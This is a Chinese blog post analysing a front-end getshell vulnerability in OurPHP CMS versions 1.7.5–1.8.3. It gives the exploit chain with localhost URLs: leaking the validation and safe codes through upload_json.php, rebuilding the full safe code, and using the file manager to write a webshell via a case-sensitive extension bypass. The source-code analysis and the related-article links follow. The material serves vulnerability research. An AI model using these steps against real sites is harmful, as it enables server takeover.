OurPHP20180718前台getshell分析

最新推荐文章于 2022-10-27 21:52:25 发布
最新推荐文章于 2022-10-27 21:52:25 发布
阅读量230 收藏
点赞数
文章标签: 数据库 php thinkphp laravel python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486352
版权

影响范围:v1.7.5-v1.8.3

先抛出payload,再进行代码分析

前台getshell

首先,访问http://127.0.0.1/ourphp20180718/function/editor/php/upload_json.php?upload_file=1

1553849472925.png

获取到: 
<!--12345||7Hv9WqglWlPJZPgrFVUvpFnP4DmuTCn1-->

构造出:

口令码:12345

安全校验码:7Hv9WqglWlPJZPgrFVUvpFnP4DmuTCn1glWlPJ(跟上图比多了后面六个字符,具体看后面代码分析)

访问 http://127.0.0.1/ourphp20180718//client/manage/ourphp_filebox.php?op=home&folder=./&validation=12345&code=7Hv9WqglWlPJZPgrFVUvpFnP4DmuTCn1glWlPJ

1553850023077.png

进行文件编辑,写入代码,修改后缀名,直接getshell

1553850170685.png

1553850216097.png

1553850246161.png

代码分析

跟进 function\editor\php\upload_json.php

1554101421627.png

继续跟进uploadsafe()函数,在function\editor\php\JSON.php238行

function uploadsafe()
    {
        global $ourphp;
        return '<!--'.$ourphp['validation'].'||'.substr($ourphp['safecode'], 0, 32).'-->';
    }

由此可知,只要在前端给参数upload_file传任意值,就会返回validation口令码和safecode安全码的前32位

继续跟,看安全码是如何生成的,在function\install\index.php288行

$ourphp_safecode = getRandomString(32);
$safecode6 = substr($ourphp_safecode , 6 , 6);
$str_f = '$';
$str_tmp = "<?php
    /*
     * Ourphp - CMS建站系统
     * Copyright (C) 2014 ourphp.net
     * 开发者:哈尔滨伟成科技有限公司
     * -------------------------------
     * 网站配置文件 (2016-10-22)
     * -------------------------------
     */

    define('OURPHPNO', true);
    define('WEB_ROOT',substr(dirname(__FILE__), 0, -7));

    include '".$mysql_file."';

    ".$str_f."ourphp = array(
        'webpath' => '/',    // 网站路径
        'validation' => '12345',    // 口令码
        'adminpath' => 'client/manage',        // 管理员默认目录
        'mysqlurl' => '".$ourphp_dburl."',    // 数据库链接地址
        'mysqlname' => '".$ourphp_dbname."',    // 数据库登录账号
        'mysqlpass' => '".$ourphp_dbpass."',    // 数据库登录密码
        'mysqldb' => '".$ourphp_mydb."',    // 数据库表名
        'filesize' => '5000000',    // 附件上传最大值
        'safecode' => '".$ourphp_safecode.$safecode6."',    // 安全校验码
        'mysqltype' => '".$mysql_type."',
    );

    ".$str_f."db = new OurPHP_Mysql(
        ".$str_f."ourphp['mysqlurl'],
        ".$str_f."ourphp['mysqlname'],
        ".$str_f."ourphp['mysqlpass'],
        ".$str_f."ourphp['mysqldb']
    );
?>";

1554102571176.png

由此可知,安全码是通过随机取一个32位字符,然后取32位的第6位之后的6位字符,拼接到后面形成

由此就能得到后台访问的关键口令码和安全码

再跟后台的文件管理模块,在\client\manage\ourphp_filebox.php45行

1554102899673.png

由此可知,只要口令码、安全校验码正确就可以对文件进行操作(编辑、重命名)

而且,835行的后缀名过滤,可用大小写绕过了

1554103007652.png

至此,payload就可以构造好啦

参考:https://xz.aliyun.com/t/4315

KEY0NE
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ourphp 1.8 后台任意文件读取漏洞1
08-04
漏洞简介:OurPHP(傲派建站系统)是一款使用PHP语言开发的网站内容管理系统,开发商为哈尔滨伟成科技有限公司。OurPHP 1.8版本存在任意文件读取漏洞,
【西湖论剑】phpok6.0前台反序列化getshell
weixin_45751765的博客
03-21 5860
1NDEX0x00 前言0x01 brain.md捋一下框架poc浅析动调一下poc(小bug 0x00 前言 西湖线下的phpok6.0 后面才知道是个0day 已知poc形式 admin.php 控制器为login 方法为update 其余参数: fid=…/index fcode=shell quickcode=……… 看页面回显似反序列化漏洞,可写入webshell 参考suanve师傅的文章做个复现 phpok6.0前台反序列化getshell 师傅的这篇和主办方的利用点有点小区别 一个是利用 $
.exp文件_(0day!文尾附Exp和彩蛋)Ourphp前台Getshell之随机码漏洞
weixin_39802784的博客
11-22 281
以下内容与本文无关:Hi兄弟萌半年过去了 有没有想我 ~我就是辣个天天在群里阴阳怪气zyy且一直鼓舞群内负责写稿,挖洞的Angle,Mg 让他们不要交稿挖到洞别交给zyy的人自昨晚与zyy对线结束后,我本想安稳睡去结果手机就一直响个不停,翻身打开手机一开哦~天呐兄弟萌快看呐 她急了她急了zyy她急了快看呐,气急败坏的赵师傅开始了她最擅长的精神胜利法!说不过就直接30天禁...
php代码审计-OurPhp 后台任意文件上传getshell
weixin_44747030的博客
10-27 461
OurPhp代码审计
[代码审计]某开源商城前台getshell
weixin_30826095的博客
02-05 254
0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来。 下面就分享一下自己审这套系统的整个过程。 0x01 系统简介 略 0x02 审计入口 看到inc\function\global.php 文件 这套系统用了360的防护代码 对get,post,cookie都进行了过滤,但有一点挺有趣的。 在p=ad...
wjdhcms前台Getshell(条件竞争)1
08-03
wjdhcms前台Getshell(条件竞争)1 wjdhcms前台Getshell(条件竞争)1是指在wjdhcms系统中,通过 CONDITIONS COMPETITION(条件竞争)攻击方式,获取服务器的shell权限的漏洞。 wjdhcms概述 wjdhcms是一款基于ASP...
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
jboss漏洞getshell工具.zip
最新发布
08-26
【JBoss 漏洞与 GetShell 工具详解】 JBoss 是一款广泛使用的开源 Java 应用服务器,由 Red Hat 公司开发并维护。它提供了全面的企业级应用程序部署和管理功能,支持多种 Java EE 规范。然而,由于其复杂性和广泛...
Getshell最全总结.pdf
07-22
getshell最全总结
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
PHP代码审计』OURPHP3.2.0.0222存在SQL注入漏洞①
Ho1aAs‘s Blog
06-10 310
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 访问后台的编辑文章/client/manage/ourphp_adview.php?ourphp_cms=edit&id=1 POST /client/manage/ourphp_adview.php?ourphp_cms=edit&id=1 HTTP/1.1 Host: 192.168.1.101 Content-Len
cms前台getshell分析
IT-Andy
12-18 1275
前言 毫无套路的在cnvd上看见了一个漏洞,毫无套路的想着分析一下 一脸懵逼的Getshell 官网地址:http://www.earcms.net/ 先到官网把源码下载下来搭建一下,结果发现源码是混淆过的 这种混淆方式很常见,解密也不难,因为已经知道是前台文件上传导致的getshell,所以暂时不需要全部解密出来一点点分析,暂时只关注他的上传点。 毫无套路的搭建完成后我们看到...
wei php getshell,海洋cms最新版前台getshell(附靶机)
weixin_30587041的博客
04-06 500
cms版本:6.45官网好像是6.48版本了直接上代码[mw_shl_code=applescript,true]function parseIf($content){if (strpos($content,'{if:')=== false){return $content;}else{$labelRule = buildregx("{if.*?)}(.*?){end if}","is");$la...
php strlen漏洞,CmsEasy前台无限制GetShell
weixin_42196750的博客
03-27 2873
来源:阿里先知(安全情报)简要描述CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话前台getshell漏洞修正;命令执行漏洞修正;我们就根据补丁来分析一下这个前台Getshell漏洞。漏洞详情修改的文件不多,通过diff发现补丁中lib/default/tool_act.php 392行的cut_image_action()函数被注释了。来看看这个函数/*function c...
PHP代码审计』OURPHP3.2.0.0222存在SQL注入漏洞②
Ho1aAs‘s Blog
06-10 446
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 访问后台的内容——文章管理——添加信息 抓包 POST /client/manage/ourphp_article.php?ourphp_cms=add HTTP/1.1 Host: 192.168.5.103 Content-Length: 269 Cache-Control: max-age=0 Upgrade-Insecure-R
代码审计:ourphp 后台任意文件读取复现
qq_43233085的博客
03-15 634
代码审计:ourphp 后台任意文件读取复现ourphp代码审计漏洞复现 ourphp OurPHP傲派企业电商建站系统基于PHP+MYSQL完美开发,企业+电商+微信+手机+APP一个平台搞定,支持N国语言建站,外贸网站首选。 官网:http://www.ourphp.net 演示:http://demo.ourphp.net 代码审计 问题出在 \client\manage\ourphp_fi...
编辑器漏洞(配合文件上传等)
guanjian_ci的博客
03-23 5812
编辑器分类:ewebeditor、kindeditor、ckeditor、fckeditor、Cute Editor、ueditor、southidceditor等等 一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等) (1)漏洞1 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp 样式页面 Admin_UploadFile.asp 上...
php疑似后门,某php一处疑似官方后门导致getshell
weixin_36430300的博客
03-21 257
return '';}(左右滑动)后门之处,暴露口令码、安全校验码的前32位,6位是在这32位里。再看看安全校验码生成的地方,在functioninstallindex.php的第288行$ourphp_safecode = getRandomString(32);$safecode6 = substr($ourphp_safecode , 6 , 6);$str_f = '$';$str_tmp...
OurPHP3.3.1审计与测试
feng的博客
06-11 838
OurPHP3.3.1审计与测试 目录遍历漏洞 还是先看一下后台关于模板的代码,首先发现对于传入的路径没有做waf,导致了目录遍历。 漏洞从client/manage/ourphp_filebox.php`的第134行开始: }else{ if(empty($_SESSION['ourphp_out'])) { $file = listDirFiles('../../templates/'.$_GET['path']); $file2 = '../../te
php ueditor getshell
07-28
最近发生了一起关于PHP UEditor的getshell事件。PHP UEditor是一个常用的富文本编辑器,用于网站的内容编辑和发布。然而,攻击者利用了其中的安全漏洞,成功地注入了恶意代码,进而控制了整个网站。 该事件引起了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值